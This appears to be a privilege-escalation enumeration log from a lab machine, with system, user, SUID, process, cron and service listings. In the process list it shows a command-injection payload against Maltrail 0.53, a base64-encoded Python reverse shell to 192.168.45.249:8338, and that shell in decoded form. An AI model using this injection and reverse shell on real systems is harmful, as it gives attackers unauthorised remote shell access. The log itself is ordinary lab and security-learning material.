System/Kernel
snort@ochima:~$ uname -a ; cat /etc/*release
Linux ochima 5.15.0-88-generic #98-Ubuntu SMP Mon Oct 2 15:18:56 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=22.04
DISTRIB_CODENAME=jammy
DISTRIB_DESCRIPTION="Ubuntu 22.04.3 LTS"
PRETTY_NAME="Ubuntu 22.04.3 LTS"
NAME="Ubuntu"
VERSION_ID="22.04"
VERSION="22.04.3 LTS (Jammy Jellyfish)"
VERSION_CODENAME=jammy
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=jammy
5.15.0-88-generic
x86_64
Ubuntu 22.04.3 LTS (Jammy Jellyfish)
Networks
snort@ochima:~$ ip route ; arp -a
default via 192.168.201.254 dev ens160 proto static
192.168.201.0/24 dev ens160 proto kernel scope link src 192.168.201.32
_gateway (192.168.201.254) at 00:50:56:9e:df:ab [ether] on ens160
snort@ochima:~$ netstat -antup | grep LIST
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8338 0.0.0.0:* LISTEN 854/python
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
Users & Groups
snort@ochima:~$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
fwupd-refresh:x:113:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
snort:x:1001:1001::/home/snort:/bin/sh
total 12
drwxr-xr-x 3 root root 4096 Dec 11 2023 ./
drwxr-xr-x 19 root root 4096 Jun 15 2022 ../
drwxr-x--- 4 snort snort 4096 Apr 6 17:53 snort/
snort@ochima:~$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=101(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=102(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=103(messagebus) gid=104(messagebus) groups=104(messagebus)
uid=104(systemd-timesync) gid=105(systemd-timesync) groups=105(systemd-timesync)
uid=105(pollinate) gid=1(daemon) groups=1(daemon)
uid=106(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(syslog) gid=113(syslog) groups=113(syslog),4(adm)
uid=108(uuidd) gid=114(uuidd) groups=114(uuidd)
uid=109(tcpdump) gid=115(tcpdump) groups=115(tcpdump)
uid=110(tss) gid=116(tss) groups=116(tss)
uid=111(landscape) gid=117(landscape) groups=117(landscape)
uid=112(usbmux) gid=46(plugdev) groups=46(plugdev)
uid=999(lxd) gid=100(users) groups=100(users)
uid=113(fwupd-refresh) gid=118(fwupd-refresh) groups=118(fwupd-refresh)
uid=1001(snort) gid=1001(snort) groups=1001(snort)
uid=1001(snort) gid=1001(snort) groups=1001(snort)
SUIDs
snort@ochima:~$ find / -perm -04000 -ls -type f 2>/dev/null | grep -v '/snap'
8988 20 -rwsr-xr-x 1 root root 18736 Feb 26 2022 /usr/libexec/polkit-agent-helper-1
13858 36 -rwsr-xr-- 1 root messagebus 35112 Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
13954 332 -rwsr-xr-x 1 root root 338536 Aug 24 2023 /usr/lib/openssh/ssh-keysign
1109 56 -rwsr-xr-x 1 root root 55672 Feb 21 2022 /usr/bin/su
8174 40 -rwsr-xr-x 1 root root 40496 Nov 24 2022 /usr/bin/newgrp
3132 44 -rwsr-xr-x 1 root root 44808 Nov 24 2022 /usr/bin/chsh
3130 72 -rwsr-xr-x 1 root root 72712 Nov 24 2022 /usr/bin/chfn
896 32 -rwsr-xr-x 1 root root 30872 Feb 26 2022 /usr/bin/pkexec
3136 72 -rwsr-xr-x 1 root root 72072 Nov 24 2022 /usr/bin/gpasswd
679 36 -rwsr-xr-x 1 root root 35200 Mar 23 2022 /usr/bin/fusermount3
1185 36 -rwsr-xr-x 1 root root 35192 Feb 21 2022 /usr/bin/umount
3138 60 -rwsr-xr-x 1 root root 59976 Nov 24 2022 /usr/bin/passwd
828 48 -rwsr-xr-x 1 root root 47480 Feb 21 2022 /usr/bin/mount
4718 228 -rwsr-xr-x 1 root root 232416 Apr 3 2023 /usr/bin/sudo
SGIDs
snort@ochima:~$ find / -perm -02000 -ls -type f 2>/dev/null | grep -v '/snap'
417 0 drwxr-sr-x 2 root systemd-journal 40 Aug 2 2024 /run/log/journal
12243 4 drwxrwsr-x 2 root staff 4096 Apr 18 2022 /var/local
12245 4 drwxrwsr-x 2 root mail 4096 Apr 21 2022 /var/mail
12664 4 drwxr-sr-x 3 root systemd-journal 4096 Jun 15 2022 /var/log/journal
278494 4 drwxr-sr-x 2 root systemd-journal 4096 Apr 6 17:35 /var/log/journal/43fddd5fdaac48989c811e81838aeb4d
292502 4 drwxrwsr-x 2 root staff 4096 Dec 11 2023 /usr/local/share/fonts
136845 16 -rwxr-sr-x 1 root utmp 14488 Mar 24 2022 /usr/lib/x86_64-linux-gnu/utempter/utempter
1240 24 -rwxr-sr-x 1 root tty 22912 Feb 21 2022 /usr/bin/write.ul
1227 24 -rwxr-sr-x 1 root tty 22904 Feb 21 2022 /usr/bin/wall
595 40 -rwxr-sr-x 1 root crontab 39568 Mar 23 2022 /usr/bin/crontab
3134 24 -rwxr-sr-x 1 root shadow 23136 Nov 24 2022 /usr/bin/expiry
3128 72 -rwxr-sr-x 1 root shadow 72184 Nov 24 2022 /usr/bin/chage
13948 288 -rwxr-sr-x 1 root _ssh 293304 Aug 24 2023 /usr/bin/ssh-agent
8377 28 -rwxr-sr-x 1 root shadow 26776 Feb 2 2023 /usr/sbin/unix_chkpwd
8223 24 -rwxr-sr-x 1 root shadow 22680 Feb 2 2023 /usr/sbin/pam_extrausers_chkpwd
Capabilities
snort@ochima:~$ getcap -r / 2>/dev/null
/snap/core20/1518/usr/bin/ping cap_net_raw=ep
/snap/core20/2015/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
Processes
snort@ochima:~$ ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.6 102008 12848 ? Ss 17:22 0:01 /sbin/init
root 491 0.0 0.7 47864 15052 ? S<s 17:22 0:00 /lib/systemd/systemd-journald
root 529 0.0 1.3 354884 27100 ? SLsl 17:22 0:00 /sbin/multipathd -d -s
root 539 0.0 0.3 26164 7020 ? Ss 17:22 0:00 /lib/systemd/systemd-udevd
systemd+ 706 0.0 0.3 236820 6480 ? Ssl 17:22 0:00 /lib/systemd/systemd-timesyncd
root 719 0.0 0.5 51140 11736 ? Ss 17:22 0:00 /usr/bin/VGAuthService
root 720 0.0 0.4 242332 9928 ? Ssl 17:22 0:01 /usr/bin/vmtoolsd
systemd+ 825 0.0 0.4 16236 8116 ? Ss 17:22 0:00 /lib/systemd/systemd-networkd
systemd+ 827 0.0 0.6 25532 12528 ? Ss 17:22 0:00 /lib/systemd/systemd-resolved
root 841 0.0 0.1 6892 2976 ? Ss 17:22 0:00 /usr/sbin/cron -f -P
message+ 842 0.0 0.2 8900 5128 ? Ss 17:22 0:00 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 853 0.0 0.1 82828 3908 ? Ssl 17:22 0:00 /usr/sbin/irqbalance --foreground
snort 854 0.0 1.4 1050460 29108 ? Ssl 17:22 0:00 /usr/bin/python /opt/maltrail-0.53/server.py
root 855 0.0 0.9 32732 19156 ? Ss 17:22 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 857 0.0 0.3 234496 6680 ? Ssl 17:22 0:00 /usr/libexec/polkitd --no-debug
syslog 858 0.0 0.2 222400 5880 ? Ssl 17:22 0:00 /usr/sbin/rsyslogd -n -iNONE
root 860 0.1 1.4 1393096 29424 ? Ssl 17:22 0:02 /usr/lib/snapd/snapd
root 862 0.0 0.3 15332 7264 ? Ss 17:22 0:00 /lib/systemd/systemd-logind
root 863 0.0 0.6 392572 12812 ? Ssl 17:22 0:00 /usr/libexec/udisks2/udisksd
root 917 0.0 0.6 317960 12248 ? Ssl 17:22 0:00 /usr/sbin/ModemManager
root 918 0.0 0.4 15424 9236 ? Ss 17:22 0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root 931 0.0 1.0 109732 21636 ? Ssl 17:22 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root 941 0.0 0.9 202868 19396 ? Ss 17:22 0:00 /usr/sbin/apache2 -k start
root 1148 0.0 0.0 6172 1076 tty1 Ss+ 17:22 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
www-data 1806 0.0 0.4 203460 10032 ? S 17:32 0:00 /usr/sbin/apache2 -k start
www-data 1817 0.0 0.4 203460 10032 ? S 17:32 0:00 /usr/sbin/apache2 -k start
www-data 1821 0.0 0.4 203460 10032 ? S 17:32 0:00 /usr/sbin/apache2 -k start
www-data 1845 0.0 0.4 203460 10036 ? S 17:32 0:00 /usr/sbin/apache2 -k start
www-data 1850 0.0 0.4 203460 10032 ? S 17:32 0:00 /usr/sbin/apache2 -k start
www-data 1856 0.0 0.4 203460 10032 ? S 17:32 0:00 /usr/sbin/apache2 -k start
www-data 1865 0.0 0.4 203460 10032 ? S 17:32 0:00 /usr/sbin/apache2 -k start
www-data 1874 0.0 0.4 203460 10032 ? S 17:32 0:00 /usr/sbin/apache2 -k start
www-data 1879 0.0 0.4 203460 10032 ? S 17:32 0:00 /usr/sbin/apache2 -k start
www-data 1881 0.0 0.4 203460 10036 ? S 17:32 0:00 /usr/sbin/apache2 -k start
snort 2252 0.0 0.0 2888 108 ? S 17:53 0:00 /bin/sh -c logger -p auth.info -t "maltrail[854]" "Failed password for ;`echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC40NS4yNDkiLDgzMzgpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKSc=" | base64 -d | sh` from 192.168.45.249 port 38230"
snort 2255 0.0 0.0 2888 956 ? S 17:53 0:00 sh
snort 2256 0.0 0.4 17476 9900 ? S 17:53 0:00 python3 -c import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.249",8338));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")
snort 2257 0.0 0.0 2888 944 pts/4 Ss+ 17:53 0:00 /bin/sh
snort 2263 0.0 0.4 17092 9884 ? Ss 17:53 0:00 /lib/systemd/systemd --user
snort 2264 0.0 0.2 104920 4976 ? S 17:53 0:00 (sd-pam)
snort 2370 0.0 0.3 17200 7868 ? S 17:53 0:00 sshd: snort@pts/5
snort 2373 0.0 0.0 2888 1796 pts/5 Ss 17:53 0:00 -sh
snort 2391 0.0 0.2 8656 5364 pts/5 S 17:54 0:00 bash
fwupd-r+ 2445 0.0 0.7 362964 15880 ? Ssl 17:55 0:00 /usr/bin/fwupdmgr refresh
root 2481 0.8 1.5 391112 31684 ? Ssl 17:55 0:00 /usr/libexec/fwupd/fwupd
root 2486 0.0 0.4 239488 8080 ? Ssl 17:55 0:00 /usr/libexec/upowerd
snort 2506 0.0 0.1 10332 3728 pts/5 R+ 17:56 0:00 ps -auxwww
root 841 0.0 0.1 6892 2976 ? Ss 17:22 0:00 /usr/sbin/cron -f -P
snort 854 0.0 1.4 1050460 29108 ? Ssl 17:22 0:00 /usr/bin/python /opt/maltrail-0.53/server.py
Cron & Systemd
snort@ochima:~$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for snort
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
NEXT LEFT LAST PASSED UNIT ACTIVATES >
Sun 2025-04-06 18:09:00 UTC 10min left Sun 2025-04-06 17:39:30 UTC 18min ago phpsessionclean.timer phpsessioncle>
Sun 2025-04-06 18:46:11 UTC 47min left Sun 2025-04-06 17:55:39 UTC 2min 34s ago fwupd-refresh.timer fwupd-refresh>
Sun 2025-04-06 18:50:23 UTC 52min left Tue 2023-10-31 04:32:35 UTC 1 year 5 months ago fstrim.timer fstrim.service
Sun 2025-04-06 21:37:30 UTC 3h 39min left Wed 2022-06-15 07:50:16 UTC 2 years 9 months ago man-db.timer man-db.service
Mon 2025-04-07 00:00:00 UTC 6h left Sun 2025-04-06 17:24:25 UTC 33min ago dpkg-db-backup.timer dpkg-db-backu>
Mon 2025-04-07 00:00:00 UTC 6h left Sun 2025-04-06 17:24:25 UTC 33min ago logrotate.timer logrotate.ser>
Mon 2025-04-07 02:48:08 UTC 8h left Thu 2022-06-16 05:52:54 UTC 2 years 9 months ago motd-news.timer motd-news.ser>
Mon 2025-04-07 02:49:00 UTC 8h left Wed 2022-06-15 07:50:16 UTC 2 years 9 months ago apt-daily.timer apt-daily.ser>
Mon 2025-04-07 06:21:16 UTC 12h left Sun 2025-04-06 17:36:49 UTC 21min ago apt-daily-upgrade.timer apt-daily-upg>
Mon 2025-04-07 17:27:18 UTC 23h left Sun 2025-04-06 17:27:18 UTC 30min ago update-notifier-download.timer update-notifi>
Mon 2025-04-07 17:37:18 UTC 23h left Sun 2025-04-06 17:37:18 UTC 20min ago systemd-tmpfiles-clean.timer systemd-tmpfi>
Tue 2025-04-08 23:58:26 UTC 2 days left Wed 2022-06-15 07:50:16 UTC 2 years 9 months ago update-notifier-motd.timer update-notifi>
Sun 2025-04-13 03:10:45 UTC 6 days left Sun 2025-04-06 17:24:25 UTC 33min ago e2scrub_all.timer e2scrub_all.s>
13 timers listed.
Pass --all to see loaded but inactive timers, too.
Services
snort@ochima:~$ systemctl list-units --state=running
UNIT LOAD ACTIVE SUB DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
init.scope loaded active running System and Service Manager
session-34.scope loaded active running Session 34 of User snort
apache2.service loaded active running The Apache HTTP Server
cron.service loaded active running Regular background program processing daemon
dbus.service loaded active running D-Bus System Message Bus
fwupd.service loaded active running Firmware update daemon
getty@tty1.service loaded active running Getty on tty1
irqbalance.service loaded active running irqbalance daemon
maltrail.service loaded active running Maltrail Server
ModemManager.service loaded active running Modem Manager
multipathd.service loaded active running Device-Mapper Multipath Device Controller
networkd-dispatcher.service loaded active running Dispatcher daemon for systemd-networkd
open-vm-tools.service loaded active running Service for virtual machines hosted on VMware
polkit.service loaded active running Authorization Manager
rsyslog.service loaded active running System Logging Service
snapd.service loaded active running Snap Daemon
ssh.service loaded active running OpenBSD Secure Shell server
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running User Login Management
systemd-networkd.service loaded active running Network Configuration
systemd-resolved.service loaded active running Network Name Resolution
systemd-timesyncd.service loaded active running Network Time Synchronization
systemd-udevd.service loaded active running Rule-based Manager for Device Events and Files
udisks2.service loaded active running Disk Manager
unattended-upgrades.service loaded active running Unattended Upgrades Shutdown
upower.service loaded active running Daemon for power management
user@1001.service loaded active running User Manager for UID 1001
vgauth.service loaded active running Authentication service for virtual machines hosted on VMware
dbus.socket loaded active running D-Bus System Message Bus Socket
multipathd.socket loaded active running multipathd control socket
snapd.socket loaded active running Socket activation for snappy daemon
syslog.socket loaded active running Syslog Socket
systemd-journald-audit.socket loaded active running Journal Audit Socket
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket loaded active running Journal Socket
systemd-networkd.socket loaded active running Network Service Netlink Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
39 loaded units listed.
maltrail.service
Sudo Version
snort@ochima:~$ sudo --version
Sudo version 1.9.9
Sudoers policy plugin version 1.9.9
Sudoers file grammar version 48
Sudoers I/O plugin version 1.9.9
Sudoers audit plugin version 1.9.9
Sudo version 1.9.9
Glibc Version
snort@ochima:~$ ldd --version
ldd (Ubuntu GLIBC 2.35-0ubuntu3.4) 2.35
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
ldd (Ubuntu GLIBC 2.35-0ubuntu3.4) 2.35